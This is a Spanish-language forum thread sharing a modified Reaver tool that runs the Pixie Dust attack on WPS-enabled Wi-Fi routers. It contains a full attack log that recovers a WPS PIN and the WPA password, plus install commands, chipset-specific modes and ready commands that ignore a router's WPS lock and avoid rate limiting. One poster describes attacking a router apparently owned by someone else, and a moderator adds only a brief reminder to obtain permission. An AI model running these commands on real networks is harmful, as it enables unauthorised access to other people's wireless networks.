Reaver modificado para Pixie Dust

t6_x · 13-04-2015 05:51:06

Hello

I made a modification to reaver for him to do the pixiedust when testing a pin number

Here's my contribution

GitHub

https://github.com/t6x/reaver-wps-fork-t6x

Example

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>

[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:........
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:........
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:........
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:.......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust]   [*] PSK1: dd:09:bd:24:..........
[Pixie-Dust]   [*] PSK2: 77:e0:dd:00:........
[Pixie-Dust]   [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust]   [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...

[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'

Any problem or suggestion please contact me

kcdtv · 13-04-2015 09:22:08

Muy buenos días t6_x smile
¡Excelente aporte!
Muchas Gracias a ti por venir registrarte aquí y compartir con nostr@s tu versión de reaver modificado para el ataque pixie dust smile
Funciona muy bien y es de lo más cómodo big_smile

Hello t6_x smile
WoW this is absolutly excelent
Thank you very much for sharing with us your modified reaver! smile
It works perfectly and is the most convenient toll with the PKR dipslayed live and the -K option for auto-pixie dust cool
We love you! big_smile

Instalación del reaver modificado por t6_x

Podemos descargar las fuentes desde la pagina github puesta en link previamente por t6_x: reaver-wps-fork-t6x (GitHub) o bien hacer lo así en linea de comando :

wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip

descomprimimos el fichero

unzip master.zip

Normalemente se ha creado una carpeta "reaver-wps-fork-t6x-master". No situamos en el directorio src que contiene :

cd reaver-wps-fork-t6x-master && cd src

lanzamos la compilación con

./configure

seguido por

make

Y por fin instalamos con

sudo make install

Podéis "aplastar" vuestra instalación previa de reaver (no hace falta des-instalar vuestro reaver "convencional")

Ejemplo de uso

¡Es genial! cool
si examinamos las opciones podemos ver un nuevo argumento : -K

-K, --pixie-dust                Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR

Tenemos tres modos de ejecución posibles:

Modo Basico : se usa cuando hemos decidido optar por llaves Diffie-Hellman cortas (opción -S en nuestro comando reaver) y se puede usar contra chipset Ralink y Broadcom
Modo E-nonce : es el modo a usar contra chipset realteck
Modo PKR : Es el modo a usar cuando el intercambio de diffie hellmann pequeñas no se puede emplear (como pasa con realteck si no conseguimos mandar el PIN en un segundo o menos

Este nuevo argumento lo cambia todo smile

Ataque pixie dust automatizado para una velocidad de formula uno

pruebo una sintaxis reaver para una velocidad optima ( -d 0 + -S )

¡Alucinante! big_smile
Tiempo total para obtener el PIN : menos de 2 segundos cool

de paso podemos ver que se enseñan y la PKR y el e-nounce :

Y además vuelve automáticamente a tirar de reaver para obtener la llave WPA... resumen y instalación paso a paso en imágenes....
Poner la calidad HD 720 a mano sino sale borroso

THANK YOU SO MUCH t6_x

Una chincheta para este tema smile

1camaron1 · 13-04-2015 22:40:54

Wooow.. muchas gracias! muy buen aporte! smile plus_un

t6_x · 14-04-2015 01:35:16

hola

Vi la foto con un pequeño error ("sh: 1: ./reaver: not found")

Lo siento por eso, me olvidé de hacer la "commit" en github. : /

Pero ya efetuei la "commit" y ya dispuesta otros problemas pequeños.

Inserte un nuevo argumento (-Z) para no hacer el "reaver" de nuevo y detener sólo en pixiedust, a veces es necesario

Una vez más, pido disculpas por el pequeño problema.

Voy a seguir modificando la herramienta hasta que sea más práctico, el uso en celular y es difícil seguir escribiendo todas esas líneas

Cualquier problema que encuentran, no exitem para abrir una aplicación en github, es más rápido para mí ver y ordenado.

adiós

Ultima edición por t6_x (14-04-2015 04:55:19)

kcdtv · 14-04-2015 16:32:21

Vi la foto con un pequeño error ("sh: 1: ./reaver: not found")

Es que he usado en la foto el argumento "-g 1" que parra reaver después el primer intento porque quería ver el tiempo para obtener los hashes y generar el PIN

Inserte un nuevo argumento (-Z) para no hacer el "reaver" de nuevo y detener sólo en pixiedust, a veces es necesario

¡Perfecto! A partir de ahora lo usare si solo quiero obtener el PIN
Muy buena idea cool

Una vez más, pido disculpas por el pequeño problema.

No es un "problema" solo un detalle para el stdout.;)
Pero tienes razón en querer hacer las cosas bien. Si veo "errores" de este tipo te los señalare wink

Cualquier problema que encuentran, no exitem para abrir una aplicación en github, es más rápido para mí ver y ordenado.

Claro.
No te preocupes: informaré aquí los usuarios sobre tus últimos desarrollos y te pasare por github los fallos y sugestiones de lo usuarios
Puedes poner un simple post tipo "nueva actualización" y iré a mirrar y daré explicaciones en español.
Nos vemos ahi que me gustaría proponerte modifcar wash para òner en salida el taged parameter que permite identifcar el chipset wifi del dispositivo / el modelo
Por defcto el stdout de wash es sobre dos liñas

$BSSID   $RSSI  $CHANNEL $LOCKED $VERSION
$ESSID

la idea sería tenr un stdout asi

$BSSID $RSSI $CHANNEL $LOCKED $VERSION
$ESSID ($Chipet $model)*

* if available

saludos

t6_x · 14-04-2015 20:09:24

Muy buena idea

Existe el problema de tiempo que puede tomar

A menudo, el router hasta aquí y te lleva mucho tiempo para levantarse msg M1

Voy a tratar de pensar en algo, vamos a hablar de una buena solución

Lamento Traducción, estoy utilizando el traductor de google

kcdtv · 15-04-2015 04:45:50

Modificación de datahead la noche pasada en la cual podemos ver una interesante nueva opción

+			-P, --pixiepust-loop            Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]

Excelente noticia...
Nos paramos al M4 lo que haría nuestro ataque "invisible" para el bloqueo del Punto de acceso ( AP rate limit )
¡Esto se pone más fino cada día! big_smile

t6_x · 15-04-2015 09:40:41

Opción -g lanzado en el wash

-g, --get-chipset                    Output Piped and tries to read the chipset with reaver

Ejemplo

# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U

Gracias por la sugerencia kcdtv, les agregué a créditos

Ultima edición por t6_x (15-04-2015 09:45:15)

kcdtv · 15-04-2015 14:33:43

WoW...
....Cada día tenemos una nueva sorpresa contigo! big_smile
¡Genial! : Le estas devolviendo colores a nuestro querido reaver.
¡Miles de Gracias para todo!

"for the record"....

Por los que no saben quien es g0tm1k, se trata nada más ni menos que de uno de de los pilares de kali linux (de hecho es administrador del foro Kali linux) smile

dynyly · 22-04-2015 16:04:31

gracias por compartir conocimientos
he intentado echar a andar el reaver modificado y no hay manera lo intento desde wifislax
; he probado de todas las maneras que conozco con el en escritorio
cd Desktop

cd cd reaver-wps-fork-t6x-master
cd src 
cd reaver-wps-fork-t6x-master && cd src
reaver-wps-fork-t6x-master: No existe el fichero o el directorio

-----------------------------

cd /root/Desktop/reaver-wps-fork-t6x-master/
cd reaver-wps-fork-t6x-master && cd src
reaver-wps-fork-t6x-master: No existe el fichero o el directorio

------------------------
le meto direcciones

cd /root/Desktop/reaver-wps-fork-t6x-master/src/reaver-wps-fork-t6x-master && cd src

; y tampoco
tambien hago lo de abrir terminal aqui sobre la carpeta src y ejecuto comandos del tuto y nada
¿hago algo mal? ¿es solo para kali?
saludos

kcdtv · 22-04-2015 21:27:16

No es solo para kali, de hecho no lo he instalado en kali aún, lo hago todo desde xubuntu.
Esto si: esta diseñado para distribuciones GNU Linux bazadas en debian y no para distribuciones bazadas en slackware

tambien hago lo de abrir terminal aqui sobre la carpeta src y ejecuto comandos del tuto y nada

Muy extraño. hmm
un error con "cd ruta_archivo" puede ocurrir al escribir mal una letra...
... Pero haciendo click derecha en la carpeta descomprimida no hay fallos posibles hmm
Deberías abrir un tema en el foro de soporte de tu distribución o en un foro dedicado a slackware..

mitxan · 28-04-2015 20:55:36

Gracias por el aporte , vamos a probarlo

Ultima edición por mitxan (28-04-2015 21:02:04)

saturno · 03-05-2015 09:49:15

lo mejor sacar clave con el wps bloqueado con pixiewps

reaver -i mon0 -b 00:AA:BB:11:22:33 -L -vv -K 1

ya sabeis que el reaver trae -L, --ignore-locks Ignore locked state reported by the target AP

y el pixiewps se necesita

-e, --pke : Enrollee public key

-s, --e-hash1 : Enrollee Hash1

-z, --e-hash2 : Enrollee Hash2

-a, --authkey : Authentication session key

-S, --dh-small : Small Diffie-Hellman keys (PKr not needed)

pues bien con el reaver poniendo -L

el pixiewps todavia no funciona con todo los router

Ultima edición por saturno (03-05-2015 15:14:55)

saturno · 03-05-2015 13:44:05

se necesita el reaver modificado para pixiewps

si pones el comando original

reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1

y el wps esta bloqueado se queda

WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

y el pixiewps no ase nada

pero si lo pones con el mismo comando pero con -L lo que hace es saltarse el bloqueo wps y el pixiewps coge los dato del wps

reaver -i mon0 -b 00:AA:BB:11:22:33 -L -vv -K 1

kcdtv · 03-05-2015 14:22:40

pero si lo pones con el mismo comando pero con -L lo que hace es saltarse el bloqueo wps y el pixiewps coge los dato del wps

Buenas smile
Una cosa : no es exactamente como lo describes :
No se "salta" el bloqueo pero ignora el estado tal cual lo anuncia el router en sus probes (estado 01 = cerrado, estado 02 = abierto )
en lugar de ponerte

WARNING: AP rate limit detected!

va a seguir intetnbado negociar el PIN

Sin -L

1 ) se detecta el bloqueo y se espera un minuto antes de volver a comprobar el estado :

Con -L

2) Puedes obtener PKR-PKE y authkey pero no podrás tener un M3 (el router manda un NACK en lugar del M3 despuès M2 << efecto del bloqueo ) y no obtendrás los E-Hash1 y E-Hash2 que son absolutamente necesarios y se contiene en el M3

Pero si el tuyo reacciona diferentemente (¿has bien mirado que tienes ehash1 Y ehash2?) sería interesante que nos diga de que modelo se trata y nbos des mas detalles sobre el y el ataque ,

saludos

saturno · 03-05-2015 17:34:16

kcdtv es un router tp-link router con wps bloqueado

e creado un video para que lo veas

descarga video

http://www82.zippyshare.com/v/p4dFgueh/file.html

no funciona con todos los router

saturno · 03-05-2015 19:18:08

kcdtv sino funciona el video usa el bsplayer

nose que formato graba el wifislax que no funciona con lo otros reproductores

con el bsplayer si funciona

http://www.bsplayer.com/bsplayer-spanis … 702719d5f5

mitxan · 03-05-2015 22:00:02

Con el VLC tambien se ve el video , eso si , vas a todo correr, jajaja.

Gracias por subirlo

kcdtv · 03-05-2015 23:05:52

plus_un
VLC lo lee todo y ni siquiera necesita codecs,
Es gratis de código libre y aunque empezó como un programa para distribuciones GNU-Linux es multiplataforma.
Esto si un poco "speed" con el vidéo big_smile
sino con parole que tenemos por defecto en xubuntu y otras distribuciones GNU Linux wink

Gracias por el video saturno.
¡Ole! smile
Muy interesante cool
Lo que haría falta, si possible, sería una captura de trafico para mirrar en detalles esto.
Es decir, si no es mucha molestia, lanzas primero airodump-ng en una consola guardando las capturas, en otra consola lanzas reaver para pixie como en el video y cierras la consola airodump-ng o parras el processo con CTRL+C cuando se acaba reaver-pixie.
Y si me puedes pasar el fichero .cap sería genial

pd: puedes subir directamente los ficheros usando el opción "subidas"

saturno · 04-05-2015 05:40:57

conseguir el .cap aver si puedo

el router siempre tiene el wps bloqueado nunca lo tiene desbloqueado y el dueño casi nunca esta conectado

haber si puede conseguir .cap con el HANDSHAKE

kcdtv · 04-05-2015 09:14:00

El handshake no interesa... lo que importa es pillar los M (reaver) wink
Te recuerdo que los tests se hacen sobre su punto de acceso o con acuerdo del propietario/adminstrador si no es el tuyo.
saludos.

saturno · 04-05-2015 10:43:13

si tiene algun fallo melo dices

.cap

http://www57.zippyshare.com/v/hQazoxvv/file.html

kcdtv · 04-05-2015 11:54:37

¡Perfecto! smile
como lo sabemos todos los routers no reaccionan iguales.
Y has puesto el dedo en algo muy interesante, y no solo para pixiewps
Porque podemos imaginar que si el routeur se pone a responder a un M2 con un M3 de vez en cuando, podríamos intentar hundir lo con M2 para ver como reacciona (¿reset del WPS? )
O probar con otro tipos de peticiones con el PIN legitimo obtenido (si se ve el caso con un router soportado)
Con tu permiso me gustaría compartir con soxrok-datahead-ath6 y wiire (los de pixiewps y reaver modificado) estos elementos.
gracias, todo esto es muy interesante wink

saturno · 04-05-2015 12:20:45

los router movistar no funciona me queda un router por probar

thuglife · 04-05-2015 14:27:52

Buenas tardes, una vez me he presentado, quería comentar el resultado de este ataque sobre un router con chipset atheros con éxito. Aunque no siempre el resultado era satisfactorio, he visto que reiniciando la señal wifi de este router que conseguia, por ejemplo, yendo a la pagina de configuración y aplicaba cambios (ningun cambio hacia pero provocaba que la señal desapareciera unos segundos) conectándome desde otro ordenador pues al volver a atacar conseguia el pin correcto.
Al segundo ataque y sucesivos no me daba resultado!! No se si es casualidad o que, tengo el .cap, recortes de la pagina de configuración del router y en un .txt los ataques lanzados con sus respectivos resultados. Todos estos ataques están en ese .cap! Luego mas tarde, sino le sabe mal, se los enviare a kcdtv. Lo intenté hace un rato pero me salió mensaje de no estar registrado. A lo mejor porque tarde tanto en redactar o porque no me presenté. 1 saludo cordial

Tema	Respuestas	Vistas	Ultimo mensaje
¡Vienen grandes cambios! por Takomou	2	169	Hoy 15:25:52 por Patcher
Pegado: Pegado:: Wireless Air Cut, auditoria del protocolo wps en Windows por Patcher [ 1 2 3 … 21 ]	521	339996	10-05-2023 18:24:28 por Betis-Jesus
Hospital clinic dump por wifiyeah [ 1 2 ]	27	1242	09-05-2023 21:32:44 por kcdtv
Hacktivismo por CHARGER22	1	205	08-05-2023 19:53:26 por kcdtv
Pegado: Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r [ 1 2 3 … 18 ]	447	66090	22-04-2023 15:31:13 por kcdtv

Foro Wifi-libre.com

#1 13-04-2015 05:51:06